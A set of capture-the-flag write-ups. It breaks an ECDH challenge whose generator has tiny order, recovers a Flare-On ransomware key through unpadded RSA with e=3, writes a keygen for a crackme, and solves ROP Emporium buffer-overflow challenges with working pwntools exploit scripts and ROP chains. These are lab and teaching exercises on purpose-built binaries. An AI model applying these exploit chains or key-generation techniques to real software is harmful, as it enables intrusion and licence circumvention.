We are given the following code that encrypts the flag:
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
from Crypto.Util.number import long_to_bytes
from hashlib import sha256
from secret import FLAG, p, b, priv_a, priv_b
F = GF(p)
E = EllipticCurve(F, [726, b])
G = E(926644437000604217447316655857202297402572559368538978912888106419470011487878351667380679323664062362524967242819810112524880301882054682462685841995367, 4856802955780604241403155772782614224057462426619061437325274365157616489963087648882578621484232159439344263863246191729458550632500259702851115715803253)
A = G * priv_a
B = G * priv_b
print(A)
print(B)
C = priv_a * B
assert C == priv_b * A
# now use it as shared secret
secret = C[0]
hash = sha256()
hash.update(long_to_bytes(secret))
key = hash.digest()[16:32]
iv = b'u\x8fo\x9aK\xc5\x17\xa7>[\x18\xa3\xc5\x11\x9en'
cipher = AES.new(key, AES.MODE_CBC, iv)
encrypted = cipher.encrypt(pad(FLAG, 16))
print(encrypted)
This code generates the elliptic curve given by the equation y**2 = x**3 + 726x + b over a finite field of order p. A generator point G is given, along with two private keys priv_a and priv_b, which are used to generate a shared secret using elliptic curve Diffie-Hellman. (If you’re not familiar with this algorithm, here’s my writeup on the basics of how it works.) The shared secret is then used to derive an AES key that encrypts the flag.
We are given the public keys A and B, but we do not know either of the private keys priv_a or priv_b, so we are unable to derive the shared secret. Our goal is to exploit a weakness in the encryption algorithm to calculate priv_a or priv_b.
The interesting thing about this challenge is that the parameters p and b are hidden from us. In order for the ECDH algorithm to work, both parties must know the order p of the finite field and the equation of the curve. In general, the value of p, the parameters of the curve, and the generator G are chosen from one of a set of standard curves that are known to be secure. For example, the curve secp256k1 is specified by the following parameters:
y**2 = x**3 + 7
p = 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffefffffc2f
G = (0x79be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798,
0x483ada7726a3c4655da4fbfc0e1108a8fd17b448a68554199c47d08ffb10d4b8)
The generator point G that we are given is not equal to the standard generator point of any commonly used curves, so chances are, we’re dealing with a nonstandard curve that was designed specifically for this challenge - probably because it’s insecure in some way. Since it’s not a standard curve, we’ll have to determine p and b solely based on the information given to us in the challenge, so let’s look at what we know.
The x- and y-coordinates of G are 509 and 511 bits respectively, suggesting that p is probably a 512-bit prime. In addition, we’re given three different points on the curve: G, A, and B. Each of those points (x,y) will need to satisfy y**2 = x**3 + 726x + b (mod p).
Let’s call the three points (x_A, y_A), (x_B, y_B), and (x_G, y_G). We can calculate three values b_A, b_B, and b_G by evaluating b = y**2 - x**3 - 726x over the integers at each point. This will get us three different values: the curve is defined over GF(p), not over the integers, so b_A, b_B, and b_G won’t necessarily be equal - but they will be congruent mod p, whatever p is.
This gives us enough information to guess a value of p. Since b_A, b_B, and b_G are all congruent mod p, their differences b_A - b_B, b_G - b_B, and b_A - b_G are all equal to 0 mod p, i.e., they are all divisible by p. Knowing that, we can look at the common divisors of b_A - b_B, b_G - b_B, and b_A - b_G. If one of those common divisors is a 512-bit prime, that’s almost certainly the value of p.
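To make the idea concrete, here is a minimal sketch on a toy curve. The parameters p_secret = 1009 and b_secret = 225 are made up for illustration (they are not the challenge values), and the points are found by brute force rather than taken from a key exchange. The gcd is only guaranteed to be a multiple of the prime; with small numbers it may carry an extra cofactor, which is why checking the result for primality matters.

```python
from math import gcd

# Hypothetical toy parameters; in the challenge, p and b are the unknowns.
p_secret, a, b_secret = 1009, 726, 225

# Map each quadratic residue mod p to one square root so points are easy to find.
sqrt_table = {}
for y in range(p_secret):
    sqrt_table.setdefault(y * y % p_secret, y)

# Collect the first three points on y^2 = x^3 + a*x + b (mod p).
points = []
for x in range(1, p_secret):
    rhs = (x**3 + a * x + b_secret) % p_secret
    if rhs in sqrt_table:
        points.append((x, sqrt_table[rhs]))
    if len(points) == 3:
        break

def get_b(point):
    # Evaluate y^2 - x^3 - a*x over the integers, with no modular reduction.
    x, y = point
    return y**2 - (x**3 + a * x)

b_values = [get_b(pt) for pt in points]
recovered = gcd(b_values[0] - b_values[1], b_values[1] - b_values[2])
print("gcd of differences:", recovered)
print("divisible by the hidden prime:", recovered % p_secret == 0)
```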
The following script calculates the greatest common divisor of b_A - b_B, b_G - b_B, and b_A - b_G:
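# Run in Sage, where gcd is built in (in plain Python, use math.gcd).
def get_b(xy):
    x = xy[0]
    y = xy[1]
    # b evaluated over the integers: equal to the real b only modulo p
    return y**2 - (x**3 + 726*x)
def guess_p(G_xy, A_xy, B_xy):
    b_G = get_b(G_xy)
    b_A = get_b(A_xy)
    b_B = get_b(B_xy)
    # every pairwise difference is a multiple of p
    return gcd(b_G - b_A, gcd(b_B - b_A, b_G - b_B))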
G_xy = (926644437000604217447316655857202297402572559368538978912888106419470011487878351667380679323664062362524967242819810112524880301882054682462685841995367, 4856802955780604241403155772782614224057462426619061437325274365157616489963087648882578621484232159439344263863246191729458550632500259702851115715803253)
A_xy = (6174416269259286934151093673164493189253884617479643341333149124572806980379124586263533252636111274525178176274923169261099721987218035121599399265706997, 2456156841357590320251214761807569562271603953403894230401577941817844043774935363309919542532110972731996540328492565967313383895865130190496346350907696)
B_xy = (4226762176873291628054959228555764767094892520498623417484902164747532571129516149589498324130156426781285021938363575037142149243496535991590582169062734, 425803237362195796450773819823046131597391930883675502922975433050925120921590881749610863732987162129269250945941632435026800264517318677407220354869865)
p = guess_p(G_xy, A_xy, B_xy)
print(p)
This prints out the value 6811640204116707417092117962115673978365477767365408659433165386030330695774965849821512765233994033921595018695941912899856987893397852151975650548637533, which is in fact a 512-bit prime. That means we’re on the right track!
Now that we know p, we can recover b by reducing any of the three b values mod p, which gives us the full equation of the curve. We can then find the order of the generator point G: the number of distinct points on the curve that can be obtained by repeatedly adding G to itself. Sage has a built-in function G.order() to do this. Since every point used in the ECDH algorithm is a multiple of G, this gives us a measure of how feasible it would be to bruteforce the value of one of the private keys.
For this curve, it turns out that the order of G is only 11, so guessing a private key is easy. To calculate priv_a, we just need to calculate kG for values of k in the range 0 through 10, then compare the result to the public key point A. The value of k that produces a matching point is priv_a (more precisely, priv_a mod 11, which produces the same shared secret). From there, we just need to calculate the shared secret, which is equal to priv_a * B, to decrypt the flag.
Final solve script:
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
from Crypto.Util.number import long_to_bytes
from hashlib import sha256
def get_b(xy):
    x = xy[0]
    y = xy[1]
    return y**2 - (x**3 + 726*x)
def guess_p(G_xy, A_xy, B_xy):
    b_G = get_b(G_xy)
    b_A = get_b(A_xy)
    b_B = get_b(B_xy)
    return gcd(b_G - b_A, gcd(b_B - b_A, b_G - b_B))
G_xy = (926644437000604217447316655857202297402572559368538978912888106419470011487878351667380679323664062362524967242819810112524880301882054682462685841995367, 4856802955780604241403155772782614224057462426619061437325274365157616489963087648882578621484232159439344263863246191729458550632500259702851115715803253)
A_xy = (6174416269259286934151093673164493189253884617479643341333149124572806980379124586263533252636111274525178176274923169261099721987218035121599399265706997, 2456156841357590320251214761807569562271603953403894230401577941817844043774935363309919542532110972731996540328492565967313383895865130190496346350907696)
B_xy = (4226762176873291628054959228555764767094892520498623417484902164747532571129516149589498324130156426781285021938363575037142149243496535991590582169062734, 425803237362195796450773819823046131597391930883675502922975433050925120921590881749610863732987162129269250945941632435026800264517318677407220354869865)
p = guess_p(G_xy, A_xy, B_xy)
b = get_b(G_xy) % p
F = GF(p)
E = EllipticCurve(F, [726, b % p])
G = E(G_xy[0], G_xy[1])
A = E(A_xy[0], A_xy[1])
B = E(B_xy[0], B_xy[1])
print("Order of G:", G.order())
# G has order 11, so try every multiple of G until one matches A
for i in range(11):
    P = i * G
    if P == A:
        priv_a = i
        break
print(priv_a)
C = priv_a * B
secret = C[0]
hash = sha256()
hash.update(long_to_bytes(int(secret)))
ciphertext = b'V\x1b\xc6&\x04Z\xb0c\xec\x1a\tn\xd9\xa6(\xc1\xe1\xc5I\xf5\x1c\xd3\xa7\xdd\xa0\x84j\x9bob\x9d"\xd8\xf7\x98?^\x9dA{\xde\x08\x8f\x84i\xbf\x1f\xab'
key = hash.digest()[16:32]
iv = b'u\x8fo\x9aK\xc5\x17\xa7>[\x18\xa3\xc5\x11\x9en'
cipher = AES.new(key, AES.MODE_CBC, iv)
flag = cipher.decrypt(ciphertext)
print(flag)
This gets us the flag: HTB{0rD3r_mUsT_b3_prEs3RveD_!!@!}
I found challenge 11 to be one of the more interesting challenges, as it required a more in-depth understanding of cryptography than last year’s ransomware challenge.
We are given two files: the challenge binary FLAREON_2023.exe, as well as a file very_important_file.d3crypt_m3. This immediately tells us that we’re likely dealing with a ransomware sample, and that we’ll have to reverse the encryption algorithm in order to recover the file.
Running the binary without any arguments didn’t do anything, so the first step was to figure out the expected argument format. Looking through the strings, I found the string .3ncrypt_m3, suggesting that the program would only encrypt files with this extension. Presumably this is intended as a safeguard to ensure that people don’t accidentally encrypt their entire filesystem. After some experimenting, I found that the program took a directory as an argument, and it would then encrypt any .3ncrypt_m3 files in that directory.
After figuring out the argument format, the next thing I tried was to encrypt a test file. We can create a test file consisting of 0x1000 zero bytes with the command fsutil file createNew zeroes.3ncrypt_m3 0x1000.
After encryption, the size of the file was 0x1100 bytes. This suggested to me that the original 0x1000 bytes of the file had been encrypted with a symmetric encryption algorithm, and that the symmetric key had been encrypted with RSA and appended to the end of the file. This is about what I was expecting, as most real ransomware performs its encryption this way.
I noticed that the string expand 32-byte k appeared in the binary, which is a constant that is used in the Salsa20 and ChaCha20 encryption algorithms. This string is accessed in the function sub_14007ee60, and the string d3crypt_m3 is accessed in the same function. This indicated to me that sub_14007ee60 was the function where the actual encryption took place.
It looked like two different random keys were being generated. The first key was 0x30 bytes, and it was concatenated to the expand 32-byte k string to form the ChaCha20 matrix. The second key was 0x18 bytes, and it was XORed with the ciphertext after the ChaCha20 encryption was performed. Both keys were then concatenated together and RSA encrypted.
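As a rough illustration of how 0x10 constant bytes plus 0x30 random bytes fill the 64-byte ChaCha20 state, here is a small sketch. It assumes the standard layout with the constant in the first row; the binary's exact ordering of the remaining bytes was not checked here, and os.urandom is only a stand-in for the program's random bytes.

```python
import os
import struct

CONSTANT = b"expand 32-byte k"   # 0x10 bytes, fixed by the cipher
random_part = os.urandom(0x30)   # stand-in for the 0x30 random bytes

# Assumed standard layout: constant first, then the remaining 0x30 bytes
# (in standard ChaCha20 these are the 32-byte key plus counter and nonce).
state_bytes = CONSTANT + random_part
state_words = struct.unpack("<16I", state_bytes)  # 16 little-endian 32-bit words

# Print the state as a 4x4 matrix of words.
for row in range(4):
    print(" ".join(f"{w:08x}" for w in state_words[4 * row:4 * row + 4]))
```

The first row always prints as 61707865 3320646e 79622d32 6b206574, which is the same constant viewed as four little-endian words and is a handy pattern to search for in a disassembler.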
Looking at how the key was generated, I found that a new key was generated for each encrypted file. The function that generated the key bytes contained the string crypto\rand\rand_lib.c, which told me that OpenSSL’s random number generation was being used. This function uses BCryptGenRandom internally and it is cryptographically secure. This effectively rules out the possibility that we’ll be able to break the encryption by guessing the key, so to break the encryption we’ll need to focus on the RSA.
The RSA encryption function is located at sub_1400987b0. The strings in this function helpfully tell us that the source file is located at crypto/rsa/rsa_ossl.c.
Comparing this source file to the decompiled code, we can see that the encryption function is rsa_ossl_public_encrypt, and that its arguments and return value are given by static int rsa_ossl_public_encrypt(int flen, const unsigned char *from, unsigned char *to, RSA *rsa, int padding).
The struct RSA is defined in crypto/rsa/rsa_local.h, and among other things it contains the value of the modulus N and the public exponent e. Setting a breakpoint at the RSA function in the debugger, we find:
N = 0xc9c330728f68087afc60a133e49b9d3de49f0ff9995c5e12e5c65c11897bc718e3e4d272d5a58ce463755b2c63467f0d09f93c31cb67fe318809af7fc8b2c8c721ab547ce4db63dbdfff5d9b06c85799fdee690f90c479c6d0b9e3a3f66e55d63029ce5a02ef84c6aadc5e2241683024cc65d75642afe0babe76f29a677ceb159be48bb3265ebd2bd519a2af7e036cc2e6401c37555761a81c3d1d28a456c38b91b559035bff013dda0439053b9e96f4b278f719e939e677d058bc6e98005aff230814a497ab34b7fa902b666d180de84e24e90f753d79db0b7217acb5c46f4d1aa56bee573f2d47a4337ddd1e2b967edc7038feeb090dec7492d94d9689bb61
e = 3
We can also see that the padding argument is equal to 3, which corresponds to the constant RSA_NO_PADDING.
For a modulus N, public exponent e, and message m, the ciphertext c is given by the equation c = m**e % N. The security of RSA relies on this equation being difficult to solve for m, but there’s one case where it’s easy: if m**e is less than N, we can find m by taking the e-th root of c. If the public exponent used is large and if short messages are padded using a secure padding algorithm, this never happens, but this challenge uses a public exponent of 3 and uses no padding.
At 0x58 bytes, the message isn’t quite short enough to be recovered simply by taking the cube root of the ciphertext, but we can use a similar strategy. We know the last 0x10 bytes of the plaintext are expand 32-byte k. If we let m refer to just the unknown part of the message, and we let x refer to the known bytes expand 32-byte k, then the equation for the ciphertext is given by (2**128 * m + x)**3 = c (mod N), since the 0x10 known bytes occupy the low 128 bits of the message. Expanding this equation out and dividing through by 2**128 mod N, we obtain a cubic in m whose left-hand side is smaller than N, so it can be solved exactly for m over the integers, as shown in the following script using Sympy:
import sympy
from sympy.abc import m
N = 0xc9c330728f68087afc60a133e49b9d3de49f0ff9995c5e12e5c65c11897bc718e3e4d272d5a58ce463755b2c63467f0d09f93c31cb67fe318809af7fc8b2c8c721ab547ce4db63dbdfff5d9b06c85799fdee690f90c479c6d0b9e3a3f66e55d63029ce5a02ef84c6aadc5e2241683024cc65d75642afe0babe76f29a677ceb159be48bb3265ebd2bd519a2af7e036cc2e6401c37555761a81c3d1d28a456c38b91b559035bff013dda0439053b9e96f4b278f719e939e677d058bc6e98005aff230814a497ab34b7fa902b666d180de84e24e90f753d79db0b7217acb5c46f4d1aa56bee573f2d47a4337ddd1e2b967edc7038feeb090dec7492d94d9689bb61
c = 0x1336e28042804094b2bf03051257aaaaba7eba3e3dd6facff7e3abdd571e9d2e2d2c84f512c0143b27207a3eac0ef965a23f4f4864c7a1ceb913ce1803dba02feb1b56cd8ebe16656abab222e8edca8e9c0dda17c370fce72fe7f6909eed1e6b02e92ebf720ba6051fd7f669cf309ba5467c1fb5d7bb2b7aeca07f11a575746c1047ea35cc3ce246ac0861f0778880d18b71fb2a8d7a736a646cf99b3dcec362d413414beb9f01815db7f72f6e081aee91f191572a28b9576f6c532349f8235b6daf31b39b5add7ade0cfbd30f704eb83d983c215de3261f73565843539f6bb46c9457df16e807449f99f3dabdddd5764fd63d09bc9c4e6844ec3410dc821ab4
x = int.from_bytes(b'expand 32-byte k','big')
cubic = sympy.Eq((2**256 * m**3) + (3 * (2**128) * m**2 * x) + (3 * m * x**2) , ((c - x**3) * pow(2**128, -1, N))%N)
print(sympy.solve(cubic))
As expected, this gives us an integer solution: 0x06f7768ff2b963f356fc25b3443f7b729f68bcbdd65f22de685c3cb5c8a2697224368530e264fd388dc962f5d737cb873e24f39709d294224a5268c3512ddb6b3e54419b41c810cf.
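The same recovery can be cross-checked without a symbolic solver. The sketch below is not the method used above; it swaps in a plain binary search, which works because the left-hand side of the cubic is strictly increasing for m >= 0. The modulus N and the 0x48-byte value m_true are made-up stand-ins, chosen only so that the sizes match the challenge.

```python
# Hypothetical stand-ins: an odd 2048-bit modulus and a made-up 0x48-byte secret.
N = 2**2048 - 1
x = int.from_bytes(b"expand 32-byte k", "big")
m_true = int.from_bytes(bytes(range(1, 0x49)), "big")

# Unpadded RSA with e = 3; the known suffix x sits in the low 128 bits.
c = pow((m_true << 128) + x, 3, N)

# Move x**3 across and divide by 2**128 modulo N (requires Python 3.8+).
rhs = ((c - x**3) * pow(2**128, -1, N)) % N

def lhs(m):
    # Left-hand side of the cubic; smaller than N for any 0x48-byte m.
    return (2**256) * m**3 + 3 * (2**128) * m**2 * x + 3 * m * x**2

# lhs is strictly increasing for m >= 0, so a binary search finds the root.
lo, hi = 0, 1 << (0x48 * 8)
while lo < hi:
    mid = (lo + hi) // 2
    if lhs(mid) < rhs:
        lo = mid + 1
    else:
        hi = mid
m_found = lo
print(m_found == m_true)
```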
The first 0x18 bytes of this integer correspond to the XOR key, and the remaining 0x30 are the unknown bytes of the ChaCha20 matrix. Since the XOR and ChaCha20 steps of the encryption are symmetric, we don’t have to reimplement them: we can just rename very_important_file.d3crypt_m3 to very_important_file.3ncrypt_m3, then set a breakpoint after the random bytes are generated and replace them with the ones we decrypted.
This gets us the flag: Wa5nt_th1s_Supp0s3d_t0_b3_4_r3vers1nG_ch4l1eng3@flare-on.com
We are asked to enter a key, and the program checks to verify that the key is valid. There are many different valid keys for this challenge, so our goal is to not only find a single key, but to reverse engineer and replicate the validation algorithm.
You can find the challenge on GitHub here, or on crackmes.one here.
Looking at the disassembled code, we can immediately see sequences of instructions that don’t make sense. In this screenshot, all disassembly after the call instruction is incorrect. However, the function call shown here never returns, so the program never encounters the incorrect instructions.
There is another function with an entry point at 4011b1, but the disassembler fails to recognize it, as it has started disassembling a cmovs instruction at 4011b0. If we instead tell the disassembler to start at address 4011b1, we get a much more reasonable result:
This anti-disassembly makes it nearly impossible to trace the control flow through static analysis. For the most part, I reconstructed the original control flow by stepping through the code in a debugger one instruction at a time.
We can immediately see a few basic checks being made. The first check verifies that the length of our key is 0x13:
Subsequently, several characters are compared to the character -. This tells us that the key consists of 4 groups of 4 characters each, separated by dashes.
I found that the first 8 characters were being compared to the characters in a long string. Initially, I thought that the key had to match the first 8 characters of this string, but on closer inspection I found that the program would accept any set of 8 characters that consisted only of letters appearing in the first half of the string (OFCKANLUPEQDHXTYWBMI).
The set of 8 characters that we choose from the first half of the string are used as the input for a validation function that determines the second 8 characters of our key. The second 8 characters are uniquely determined by this validation function: the program generates the remaining part of the key, then compares the rest of our input to it.
Technically, this is already enough to obtain a valid key. Since the program generates the entire key before comparing it to the input, we can just set a breakpoint in the debugger after the key is generated and read it from memory. This is how I approached the challenge initially, but then I went back and reverse engineered the validation function.
The first thing the program does after checking the first 8 characters is to generate another 8-character string using values from the second half of the long string in the program’s memory. It turns out that long string is actually two separate lookup tables: the program finds the indices of the first 8 key characters in the first lookup table, then chooses the corresponding characters from the second lookup table.
For example, if we entered a key that began with OFCK-ANLU, the program would generate the string mqXagNiZ.
table1 = 'OFCKANLUPEQDHXTYWBMI'
table2 = 'mqXagNiZJWlEFSydocHP%#"'
def get_indices(key):
    res = ''
    for c in key: res += table2[table1.index(c)]
    return res
The newly generated string then has a series of transformations applied to it. Tracing through the program’s execution, I found that the string was being passed to a function that referenced the values 0xcbf29ce484222325 and 0x100000001b3. On closer inspection, I found that these values were actually constants hard-coded into the binary:
I Googled these values and found that they are the 64-bit offset basis (the initial state) and the 64-bit prime of the FNV-1 hash function. Checking the output of the function in the binary, I verified that it was consistent with the FNV-1 hash of the string.
def fnv1_64(data):
    state = 0xcbf29ce484222325
    prime = 0x100000001b3
    for i in data:
        state = (state * prime) % 2**64
        state ^= i
    return state
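When identifying a hash from its constants, it is worth ruling out the closely related FNV-1a variant, which uses the same two constants but XORs before multiplying. The sketch below places both side by side; the function names are my own, and the single-byte input is just a convenient check value.

```python
OFFSET_BASIS = 0xcbf29ce484222325
FNV_PRIME = 0x100000001b3
MASK64 = 2**64 - 1

def fnv1_64(data):
    # FNV-1: multiply first, then XOR in the next byte.
    state = OFFSET_BASIS
    for byte in data:
        state = (state * FNV_PRIME) & MASK64
        state ^= byte
    return state

def fnv1a_64(data):
    # FNV-1a: XOR in the next byte first, then multiply.
    state = OFFSET_BASIS
    for byte in data:
        state ^= byte
        state = (state * FNV_PRIME) & MASK64
    return state

print(hex(fnv1_64(b"a")))   # 0xaf63bd4c8601b7be
print(hex(fnv1a_64(b"a")))  # 0xaf63dc4c8601ec8c
```

Comparing a single hash captured in the debugger against both outputs is usually enough to tell which variant a binary implements.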
This hash was then passed into a variation of the xorshift PRNG algorithm.
Fortunately, this was one of the few functions that actually had reasonable-looking decompilation, so it was pretty straightforward to replicate:
def xorshift(state):
    mask = 0xffffffffffffffff
    state ^= ((state << 0xd) & mask)
    state ^= ((state >> 0x7) & mask)
    state ^= ((state << 0x11) & mask)
    return (state & mask)
The xorshift function was called 256 times, and the least significant byte was saved each time, leaving us with an array of 256 pseudorandom bytes.
I then found that a second 256-byte array was being generated. The obfuscated disassembly was particularly confusing in this stage, so rather than attempt to follow the control flow, I just stepped through the code and observed what was happening in memory.
I found that an array was being initialized with the values 0 to 255. The values in the array were then replaced with different values in order, one byte at a time.
This was already enough to suggest to me that RC4 was being used. On closer inspection, I found that the first 256-byte array was being used as a key to derive the second array using RC4.
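For reference, this is what the RC4 pattern looks like in plain Python: an identity array of 0 to 255 that is permuted in order under control of the key, followed by the keystream generator. This is a textbook implementation, not code lifted from the binary, and the function names are my own.

```python
def rc4_ksa(key):
    # Key scheduling: start from the identity permutation 0..255,
    # then swap entries in order, driven by the key bytes.
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    return S

def rc4_crypt(key, data):
    # Keystream generation XORed over the data (encrypt and decrypt are identical).
    S = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

print(rc4_crypt(b"Key", b"Plaintext").hex())  # bbf316e8d940af0ad3
```

Watching a 256-entry identity table get shuffled in place, one index at a time, is the usual giveaway for this key schedule in a debugger.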
Once the RC4 key is initialized, the program returns to the initial string that was used as input to the FNV-1 hash and encrypts it. At that point, the program returns to the xorshift function and generates more pseudorandom numbers, which are used to choose random indices into the RC4-encrypted string. Repeated indices are discarded, and the program continues to call the xorshift function until 4 distinct indices are produced:
indices = []
while len(indices) < 4:
    res = xorshift(res)
    if ct[res % 8] not in indices: indices.append(ct[res % 8])
The 4 resulting bytes are then used to index into the first 16 characters of the long string (OFCKANLUPEQDHXTY): each byte is split into its low and high nibble, and each nibble selects one character, creating a new string of 8 capital letters.
second_key = ''
short_table1 = table1[0:0x10]
for i in indices:
    second_key += short_table1[i % 0x10]
    second_key += short_table1[(i // 0x10) % 0x10]
These 8 capital letters are expected to be the second 8 characters of our original input. If the input does not match these 8 characters, then our key is invalid.
Putting all of this together, we finally have a keygen script:
from Crypto.Cipher import ARC4
table1 = 'OFCKANLUPEQDHXTYWBMI'
table2 = 'mqXagNiZJWlEFSydocHP%#"'
def get_indices(key):
    res = ''
    for c in key: res += table2[table1.index(c)]
    return res
def fnv1_64(data):
    state = 0xcbf29ce484222325
    prime = 0x100000001b3
    for i in data:
        state = (state * prime) % 2**64
        state ^= i
    return state
def xorshift(state):
    mask = 0xffffffffffffffff
    state ^= ((state << 0xd) & mask)
    state ^= ((state >> 0x7) & mask)
    state ^= ((state << 0x11) & mask)
    return (state & mask)
first_key = input(f"Enter any 8 characters from the following table: {table1}\n")
table2_key = get_indices(first_key).encode('utf-8')
res = fnv1_64(table2_key)
n = 256
lsb_arr = b''
for i in range(n):
    res = xorshift(res)
    lsb_arr += (res & 0xff).to_bytes(1, 'little')
cipher = ARC4.new(lsb_arr)
ct = cipher.encrypt(table2_key)
indices = []
while len(indices) < 4:
    res = xorshift(res)
    if ct[res % 8] not in indices: indices.append(ct[res % 8])
second_key = ''
short_table1 = table1[0:0x10]
for i in indices:
    second_key += short_table1[i % 0x10]
    second_key += short_table1[(i // 0x10) % 0x10]
final_key = f"{first_key[0:4]}-{first_key[4:8]}-{second_key[0:4]}-{second_key[4:8]}"
print(f"Generated key {final_key}")
ROP Emporium is a series of eight challenges designed to teach the basics of return-oriented programming. The challenge binaries are available in several different architectures, but this writeup will look only at the x86_64 version.
The challenge binaries and instructions are available here.
In order to read the flag, we need to call the function ret2win:
Fortunately, we are provided with a vulnerable function. This function allows us to read 0x38 bytes into a buffer of size 0x20, allowing us to overflow the buffer and overwrite the return address.
We can write 40 bytes to fill the 0x20-byte buffer and the 8-byte saved rbp, then overwrite the return address with the address of ret2win.
from pwn import *
chal = process("./ret2win")
send_str = b'a'*40 + p64(0x40075a)
print(chal.recvuntil(b'>'))
chal.sendline(send_str)
print(chal.recvall())
For this challenge, we will need to do more than just call a single function. We are provided with the command string to open the flag file, but it is not used as an argument to system().
We are also provided with a call to system("/bin/ls").
The solution is to load the address of the necessary string into rdi, then return to the call to system(). To do this, we need the gadget pop rdi; ret, which we can find at address 0x4007c3.
from pwn import *
pop_rdi = 0x4007c3
string_addr = 0x601060
system_addr = 0x40074b
chal = process("./split")
send_str = b'a'*40 + p64(pop_rdi) + p64(string_addr) + p64(system_addr)
print(chal.recvuntil(b'>'))
chal.sendline(send_str)
print(chal.recvall())
This challenge tells us that we must call three functions called callme_one, callme_two, and callme_three with arguments 0xdeadbeefdeadbeef, 0xcafebabecafebabe, and 0xd00df00dd00df00d.
The callme functions are located in the external library libcallme.so. We can find calls to each of the callme functions in the .plt section. To call the functions, we must find a way to load the correct arguments into rdi, rsi, and rdx (the first three argument registers in the x86_64 System V calling convention), then return to the address in the .plt section where they are called.
To make things easier for us, the challenge provides us with “useful gadgets” that load in the correct arguments. We must return to this gadget before each function call.
Here is a first attempt at a script:
from pwn import *
arg1 = 0xdeadbeefdeadbeef
arg2 = 0xcafebabecafebabe
arg3 = 0xd00df00dd00df00d
one_addr = 0x400720
two_addr = 0x400740
three_addr = 0x4006f0
gadget = 0x40093c
call_args = p64(gadget) + p64(arg1) + p64(arg2) + p64(arg3)
chal = process('./callme')
send_str = b'a'*40 + call_args + p64(one_addr) + call_args + p64(two_addr) + call_args + p64(three_addr)
f = open('fake_stdin','wb')
f.write(send_str)
f.close()
print(chal.recvuntil(b'>'))
chal.sendline(send_str)
print(chal.recvall())
This script seems like it should work, but it segfaults. What has gone wrong? Looking at the segfault in gdb, it appears that callme_one was called with the correct arguments, but the segfault has occurred at a seemingly random point in fclose().
This left me confused for a while, but it turns out that ROP Emporium has a “common pitfalls” section warning us of this exact problem:
If you’re segfaulting on a movaps instruction in buffered_vfprintf() or do_system() in the x86_64 challenges, then ensure the stack is 16-byte aligned before returning to GLIBC functions such as printf() or system(). Some versions of GLIBC uses movaps instructions to move data onto the stack in certain functions. The 64 bit calling convention requires the stack to be 16-byte aligned before a call instruction but this is easily violated during ROP chain execution, causing all further calls from that function to be made with a misaligned stack. movaps triggers a general protection fault when operating on unaligned data, so try padding your ROP chain with an extra ret before returning into a function or return further into a function to skip a push instruction.
Sure enough, our segfault happens on a movaps instruction. All we need to do to fix the issue is add an extra ret instruction to the start of the chain.
Here is our final script with the extra ret added:
from pwn import *
arg1 = 0xdeadbeefdeadbeef
arg2 = 0xcafebabecafebabe
arg3 = 0xd00df00dd00df00d
one_addr = 0x400720
two_addr = 0x400740
three_addr = 0x4006f0
gadget = 0x40093c
ret = 0x4006be
call_args = p64(gadget) + p64(arg1) + p64(arg2) + p64(arg3)
chal = process('./callme')
send_str = b'a'*40 + p64(ret) + call_args + p64(one_addr) + call_args + p64(two_addr) + call_args + p64(three_addr)
print(chal.recvuntil(b'>'))
chal.sendline(send_str)
print(chal.recvall())
For this challenge, we are given a function called print_file() that we must call with the argument flag.txt, but this string is not present in the executable. We will need to figure out how to write the string ourselves.
The “useful gadget” provided to us this time around is mov [r14], r15; ret. If we can load an address we want to write to into r14 and the string flag.txt into r15, then we can write flag.txt to memory. This will allow us to pass its address to print_file() as an argument.
flag.txt is exactly 8 bytes long, so it fits into a register. Using the gadget pop r14; pop r15; ret, we can pop an address in the .data section into r14 and flag.txt into r15. I chose the start of the .data section as the address to use for this - it is not used by any other part of the program, and it is all zeroes, meaning that we do not have to worry about null terminating the string. We can then add mov [r14], r15; ret as the next part of the chain, allowing us to write the string to memory.
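As a quick sanity check on the claim that the string fits in a register, the sketch below shows the 64-bit value that r15 would hold, using only the standard library. Because x86_64 is little-endian, storing that register to memory reproduces the original byte order.

```python
import struct

target = b"flag.txt"
assert len(target) == 8  # exactly one 64-bit register

# Value that ends up in r15 when these 8 bytes are popped off the stack.
as_register = int.from_bytes(target, "little")
print(hex(as_register))  # 0x7478742e67616c66

# mov [r14], r15 stores the register little-endian, restoring the string.
print(struct.pack("<Q", as_register))
```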
At that point, we can pass the address of flag.txt as an argument to print_file() via rdi, as we did with the previous challenges.
Final solve script:
from pwn import *
pop_r14_r15 = 0x400690 # pop r14; pop r15; ret
mov_r14 = 0x400628 # mov [r14], r15; ret
pop_rdi = 0x400693 # pop rdi; ret
data_addr = 0x601028 # start of .data section
print_file = 0x400620 # call print_file
chal = process("./write4")
send_str = b'a'*40 + p64(pop_r14_r15) + p64(data_addr) + b'flag.txt' + p64(mov_r14) + p64(pop_rdi) + p64(data_addr) + p64(print_file)
print(chal.recvuntil(b'>'))
chal.sendline(send_str)
print(chal.recvall())
This challenge is identical to the last one, except that we are prevented from using the characters x, g, a, and . (a period). This means that we can no longer directly write flag.txt to the buffer - we have to obfuscate it somehow.
The useful gadgets for this challenge give us a clue on how to do this. We are given the gadget xor byte ptr [r15], r14b ; ret, so we can perform a single-byte XOR on an arbitrary value.
To avoid the bad characters, we can XOR each byte of the input string with 0xff, then create a chain that performs the XOR again to restore the original values. At first, I tried to construct the chain like this:
deobfuscate_flag = b''
for addr in range(data_addr, data_addr + 8):
    deobfuscate_flag += p64(pop_r15) # pop r15; ret
    deobfuscate_flag += p64(addr)
    deobfuscate_flag += p64(xor_data) # xor byte ptr [r15], r14b ; ret
This almost worked, but there was a problem: the x in flag.txt was not being XORed. It turned out that this had to do with where the data was being written - my chosen address for the obfuscated flag.txt was 0x601028, and the x was located at 0x60102e. But 0x2e is the period character, which is one of the forbidden characters, so that address itself could not appear in the chain! We can deal with the issue by using the start address 0x601038 instead.
